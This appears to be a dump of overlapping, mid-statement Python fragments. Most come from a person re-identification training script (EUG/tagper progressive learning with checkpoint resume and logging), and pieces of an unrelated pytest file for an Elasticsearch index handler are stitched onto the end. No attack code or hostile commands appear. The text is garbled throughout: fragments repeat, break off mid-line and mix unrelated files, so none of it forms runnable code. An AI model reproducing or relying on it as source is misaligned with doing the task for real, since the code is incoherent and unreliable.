max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,", "datasets from my_reid import models import numpy as np import", "start_step) else: print(\"resume failed\", start_step, files) return start_step, ckpt_file def", "= re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file = \"\" # find", "Path('/mnt/') if father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器", "utf-8 -*- # @Time : 2020/8/26 下午8:26 # @Author :", "train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间. # 数据格式为 step_time", "Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark =", "= 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training", "type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int,", "iter_mode = 2 #迭代模式,确定是否训练tagper for step in range(total_step): # for", "label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if", ": 2020/9/3 上午11:03 # @Author : Joselynzhao # @Email :", "@Time : 2020/9/3 上午11:03 # @Author : Joselynzhao # @Email", "保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题.", "# mAP, rank1, rank5, rank10, rank20 = 0, 0, 0,", "start_step, files) return start_step, ckpt_file def main(args): father = Path('/mnt/')", "save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置. total_step =", "utf-8 -*- # @Time : 2020/9/1 下午7:07 # @Author :", "记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info =", "import argparse import os import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import", "for resume if step < resume_step: continue ratio = (step", "@Time : 2020/9/1 下午7:07 # @Author : Joselynzhao # @Email", "step {}:\\t Nums_to_be_select {} \\t Ritio \\t Logs-dir {}\".format( args.EF,", "ckpt_file def main(args): father = Path('/mnt/') if father.exists(): # 是在服务器上", "{:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__ == '__main__':", "args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select {}", "selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0", "+ '-' * 20) config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'), 'a')", "= tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre", "dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__", "start step files = os.listdir(savepath) files.sort() for filename in files:", "resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file", "'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for one in config_info: key,value=map(str,one.split('='))", "dataf_file.close() train_time_file.close() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Progressive Learning", "if step < resume_step: continue ratio = (step + 1)", "= Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') #", "new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre =", "= args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select", "and unlabeled data for training dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset))", ": Joselynzhao # @Email : <EMAIL> # @File : atmpro1_vsm.py", "break #args.vsm_lambda的衰减 0.5 - 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda", "@Email : <EMAIL> # @File : atmpro1_vsm.py # @Software: PyCharm", "default='atm') parser.add_argument('--exp_aim', type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume',", "argparse import os import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger", "2020/9/3 上午11:03 # @Author : Joselynzhao # @Email : <EMAIL>", "#特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file", "total_step = 100 // args.EF + 1 sys.stdout = Logger(osp.join(save_path,", "= Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file", "os.path as osp import sys from torch.backends import cudnn from", "total_time. total_time = 0 # get all the labeled and", "= raw_label_pre,raw_select_pre end_time = time.time() step_time = end_time - start_time", "as DDP from torch.utils.data.distributed import DistributedSampler from pathlib import Path", "lamda=args.lamda) new_train_data = l_data unselected_data = u_data iter_mode = 2", "step_time total_time. total_time = 0 # get all the labeled", "# @Time : 2020/8/26 下午8:26 # @Author : Joselynzhao #", "resume_step: continue ratio = (step + 1) * args.EF /", "import datasets from my_reid import models import numpy as np", "coding: utf-8 -*- # @Time : 2020/8/26 下午8:26 # @Author", "rank10, rank20 = 0, 0, 0, 0, 0 mAP, rank1,", "0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t =", "# 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径.", "min(nums_to_select, len(u_data))) _, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{}", "+ time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') #", "iter_mode=1 #切换模式 print('tagper is stop') else: #mode = 1 #", "args.EF + 1 sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) +", "2020/8/26 下午8:26 # @Author : Joselynzhao # @Email : <EMAIL>", "import load_checkpoint from torch import nn import time import pickle", "= len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init) resume_step,", "from torch.backends import cudnn from my_reid.utils.serialization import load_checkpoint from torch", "parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss',", "Learning for One-Example re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b',", "get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init) resume_step, ckpt_file = -1, '' if", "tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _, _, raw_select_pre", "data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器", "'-' * 20) config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'), 'a') #", "config_info.sort() for one in config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path)", "tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y, pred_score, label_pre,dists=", "reid model\") eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if", "epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step)", "import DistributedSampler from pathlib import Path def resume(savepath): import re", "Ritio \\t Logs-dir {}\".format( args.EF, step, nums_to_select, ratio, save_path)) #", "if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is stop') else: #mode", "= Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else:", "print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select {} \\t Ritio \\t Logs-dir", "os.listdir(savepath) files.sort() for filename in files: try: iter_ = int(pattern.search(filename).groups()[0])", "= Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark", "上午11:03 # @Author : Joselynzhao # @Email : <EMAIL> #", "model\") eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if step", "stop') else: #mode = 1 # raw_select_pre = raw_select_pre_t #", "filename) except: continue # if need resume if start_step >=", "iter_ > start_step: start_step = iter_ ckpt_file = osp.join(savepath, filename)", "= -1, '' if args.resume: resume_step, ckpt_file = resume(save_path) #", "type=int, default=70) parser.add_argument('-s', '--step_size', type=int, default=55) parser.add_argument('--lamda', type=float, default=0.5) main(parser.parse_args())", "# @Desc : #!/usr/bin/python3.6 # -*- coding: utf-8 -*- #", "if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file =", "type=str, default='0') parser.add_argument('--exp_name', type=str, default='atm') parser.add_argument('--exp_aim', type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py')", "len(u_data): break #args.vsm_lambda的衰减 0.5 - 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda", "iter_ ckpt_file = osp.join(savepath, filename) except: continue # if need", "the EUG algorithm eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data,", "in config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20", "total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {} {:.2%}", "One-Example re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int,", "paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames', type=int,", "print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort()", "下午7:07 # @Author : Joselynzhao # @Email : <EMAIL> #", "+ '.txt')) dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题.", "= str(args).split('(')[1].strip(')').split(',') config_info.sort() for one in config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\''))", "{:.2%}\\n'.format(step, mAP, rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx", "raw_select_pre_t # raw_select_pre_t = 0 label_pre,select_pre = raw_label_pre,raw_select_pre end_time =", "-*- # @Time : 2020/8/26 下午8:26 # @Author : Joselynzhao", "DDP from torch.utils.data.distributed import DistributedSampler from pathlib import Path def", "parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss', type=str,", "unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm()", "step_time, total_time)) kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre))", "t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre = t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1", "# -*- coding: utf-8 -*- # @Time : 2020/9/3 上午11:03", "'''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info", "data for training dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples =", "warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger import os.path as osp import", "training dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples = len(dataset_all.train) l_data,", "= int(len(u_data) * ratio_t) if nums_to_select >= len(u_data): break #args.vsm_lambda的衰减", "config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间. # 数据格式为", "type=float, default=-1) parser.add_argument('-m', '--momentum', type=float, default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70)", "type=int, default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样.", "parser.add_argument('-m', '--momentum', type=float, default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s', '--step_size',", "open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间. # 数据格式为 step_time total_time. total_time", "print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20 + 'config_info' + '-'", "new_train_data = l_data unselected_data = u_data iter_mode = 2 #迭代模式,确定是否训练tagper", "pickle import torch.distributed as dist from torch.nn.parallel import DistributedDataParallel as", "= int(pattern.search(filename).groups()[0]) print(iter_) if iter_ > start_step: start_step = iter_", "#不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str, default='atm') parser.add_argument('--exp_aim', type=str,", "try: iter_ = int(pattern.search(filename).groups()[0]) print(iter_) if iter_ > start_step: start_step", "# find start step files = os.listdir(savepath) files.sort() for filename", "osp.join(savepath, filename) except: continue # if need resume if start_step", ": from my_reid.eug import * from my_reid import datasets from", "print(iter_) if iter_ > start_step: start_step = iter_ ckpt_file =", "# label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training tagper model\")", ": Joselynzhao # @Email : <EMAIL> # @File : atmpro1.py", "step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if step != resume_step else", "= label_pre,select_pre label_pre,select_pre = t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式", "default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames',", "{:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step, mAP, rank1, rank5, rank10, rank20))", "os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置. total_step = 100 //", "save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all,", "os import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger import os.path", "default=16) parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t', type=float,", "load ckpt start_time = time.time() print(\"training reid model\") eug.train(new_train_data, unselected_data,", "parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m', '--momentum',", "default=-1) parser.add_argument('-m', '--momentum', type=float, default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s',", "sys from torch.backends import cudnn from my_reid.utils.serialization import load_checkpoint from", "numpy as np import torch import argparse import os import", "save_path)) # train the model or load ckpt start_time =", "parser.add_argument('--exp_aim', type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str,", "= 1 # raw_select_pre = raw_select_pre_t # raw_select_pre_t = 0", "print(\"continued from iter step\", start_step) else: print(\"resume failed\", start_step, files)", ": 2020/9/1 下午7:07 # @Author : Joselynzhao # @Email :", "{:.2%} {:.2%} {:.2%}\\n'.format(step, mAP, rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists=", "'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file = open(osp.join(save_path,", "+ total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {}", "print(\"resume failed\", start_step, files) return start_step, ckpt_file def main(args): father", "return start_step, ckpt_file def main(args): father = Path('/mnt/') if father.exists():", "/ 100 ratio_t = (step+1+args.t) * args.EF /100 nums_to_select =", "#!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time : 2020/8/26", "#本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) #" ]
[ "OF ANY # KIND, either express or implied. See the", "is not None) assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) ==", ") @pytest.mark.unit def test__get_alias_from_namespace(): namespace = 'A_Gather_Form_V1' res = index_handler.get_alias_from_namespace(namespace)", "WARRANTIES OR CONDITIONS OF ANY # KIND, either express or", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "specific language governing permissions and limitations # under the License.", "'operational_status'), sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def", "under the License is distributed on an # \"AS IS\"", "es = TestElasticsearch.get_session() doc_id = 'poly-test-doc' doc = { 'id':", "BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either", "PolySchemaB): # register index with mapping es = TestElasticsearch.get_session() doc_id", "name = 'Person' es_options = SubscriptionDefinition.get('es_options') geo_name = es_options.get('geo_point_name') auto_ts", "find imperfect by string # migrate to schema B index_handler.update_es_index(es,", "aet.logger import get_logger from app import index_handler from . import", "= index_a.get('name') index_b = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB )", "\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY #", "assert(first('$.beds.type', res) == 'integer') assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res)", "= { 'id': doc_id, 'poly': '1001' } index_a = index_handler.get_es_index_from_subscription(", "name = 'a-topic' alias = es_options.get('alias_name') index = index_handler.get_es_index_from_subscription( es_options,", "res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema):", "== 'object') assert(first('$.meta.type', res) == 'object') assert(first('$.mandatory_date.type', res) == 'date')", "distributed with this work for additional information # regarding copyright", "es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA ) index_name = index_a.get('name') index_b =", "for the # specific language governing permissions and limitations #", "{\"poly\": 1001}} }) assert(res.get('hits').get('max_score') < 1.0) # find imperfect by", ") index_name = index_a.get('name') index_b = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant',", ": http://www.eHealthAfrica.org # # See the NOTICE file distributed with", "See the License for the # specific language governing permissions", "to in writing, # software distributed under the License is", "\"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0) # find", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "res = index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res) == 'integer') assert(first('$.username.type', res) ==", "{\"poly\": 1001}} }) assert(res.get('hits').get('max_score') == 1.0) # find by int", "@pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options = SubscriptionDefinition.get('es_options') tenant = 'dev'", "NotFoundError from aet.logger import get_logger from app import index_handler from", "Africa : http://www.eHealthAfrica.org # # See the NOTICE file distributed", "== 'date') assert(first('$.optional_dt.type', res) == 'date') assert(first('$.optional_dt.format', res) == 'epoch_millis')", "from app import index_handler from . import * # noqa", "= requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options", "for jsonpath @responses.activate @pytest.mark.unit def test__handle_http(): responses.add( responses.GET, 'http://bad-url', json={'error':", ") res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition,", "f'$.body.mappings._doc.properties.{geo_name}', index) is not None) @pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name", "assert(first('$.optional_dt.type', res) == 'date') assert(first('$.optional_dt.format', res) == 'epoch_millis') assert(len(list(res.keys())) ==", "geo_name = es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}', index) is not None) @pytest.mark.unit", "json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test__get_alias_from_namespace(): namespace = 'A_Gather_Form_V1'", "by string # migrate to schema B index_handler.update_es_index(es, index_b, 'test-tenant',", "= index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name)", "es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0)", "implied. See the License for the # specific language governing", "work for additional information # regarding copyright ownership. # #", "= index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index = index.get('mappings', None) assert(len(index)", "TestElasticsearch.get_session() doc_id = 'poly-test-doc' doc = { 'id': doc_id, 'poly':", "assert(first('$.name', index) == f'{tenant}.{name}') geo_name = es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}', index)", "es_options.get('auto_timestamp') index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index = index.get('mappings',", "\"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') < 1.0) # find", "string # migrate to schema B index_handler.update_es_index(es, index_b, 'test-tenant', alias)", "requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options =", "'a-topic' alias = es_options.get('alias_name') index = index_handler.get_es_index_from_subscription( es_options, name, tenant,", "res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score')", "# register index with mapping es = TestElasticsearch.get_session() doc_id =", "index_b = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB ) alias =", "res) == 'date') assert(first('$.mandatory_date.format', res) == 'date') assert(first('$.optional_dt.type', res) ==", "copyright ownership. # # Licensed under the Apache License, Version", "result = index_handler._find_timestamp(ComplexSchema) assert(result == 'timestamp') @pytest.mark.unit def test___format_lookups(ComplexSchema): formatted", "index_handler from . import * # noqa # fixtures LOG", "es_options, name, tenant, ComplexSchema ) LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index) ==", "compliance with # the License. You may obtain a copy", "= es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') <", "== 'date') assert(first('$.geometry.type', res) == 'object') assert(first('$.meta.type', res) == 'object')", "elasticsearch.exceptions import NotFoundError from aet.logger import get_logger from app import", "either express or implied. See the License for the #", "== json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test__get_alias_from_namespace(): namespace =", ") alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A index_handler.update_es_index(es, index_a,", "register schema A index_handler.update_es_index(es, index_a, 'test-tenant', alias) # put doc", "'http://bad-url', json={'error': 'not found'}, status=404 ) res = requests.get('http://bad-url') with", "= 'a-topic' alias = es_options.get('alias_name') index = index_handler.get_es_index_from_subscription( es_options, name,", "auto_ts, ComplexSchema) index = index.get('mappings', None) assert(len(index) == 1) assert(first('$._doc',", "assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name' res", "def test__get_alias_from_namespace(): namespace = 'A_Gather_Form_V1' res = index_handler.get_alias_from_namespace(namespace) assert(res ==", "index) is not None) @pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name =", "alias) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}}", "alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A index_handler.update_es_index(es, index_a, 'test-tenant',", "body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') == 1.0) #", "1001}} }) assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string", "matching = ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True) ==", "responses.add( responses.GET, 'http://bad-url', json={'error': 'not found'}, status=404 ) res =", "es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') < 1.0)", "def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name = 'Person' es_options = SubscriptionDefinition.get('es_options') geo_name", "find by string res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\":", "def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options = SubscriptionDefinition.get('es_options') tenant = 'dev' name", "= es_options.get('auto_timestamp') index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index =", "from . import * # noqa # fixtures LOG =", "assert(first('$.mandatory_date.format', res) == 'date') assert(first('$.optional_dt.type', res) == 'date') assert(first('$.optional_dt.format', res)", "'poly': '1001' } index_a = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA", "== 'timestamp') @pytest.mark.unit def test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema) assert( json.dumps(", "by eHealth Africa : http://www.eHealthAfrica.org # # See the NOTICE", "assert(res == 'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): # register", "use this file except in compliance with # the License.", "index_name = index_a.get('name') index_b = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB", "name='test1', tenant='test-tenant', schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "(the 'License'); # you may not use this file except", "def test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get( 'operational_status'), sort_keys=True)", "def test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema) assert(result == 'timestamp') @pytest.mark.unit def", "index_a = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA ) index_name =", "= 'kibana-index-name' res = index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title') == name)", "# specific language governing permissions and limitations # under the", "test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema) assert(result == 'timestamp') @pytest.mark.unit def test___format_lookups(ComplexSchema):", "# register schema A index_handler.update_es_index(es, index_a, 'test-tenant', alias) # put", "index_b, 'test-tenant', alias) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\":", "schema A index_handler.update_es_index(es, index_a, 'test-tenant', alias) # put doc es.create(", "= 'Person' es_options = SubscriptionDefinition.get('es_options') geo_name = es_options.get('geo_point_name') auto_ts =", "time import sleep from elasticsearch.exceptions import NotFoundError from aet.logger import", "Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org # #", "ComplexSchema): name = 'Person' es_options = SubscriptionDefinition.get('es_options') geo_name = es_options.get('geo_point_name')", "name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema) assert(result == 'timestamp')", "the NOTICE file distributed with this work for additional 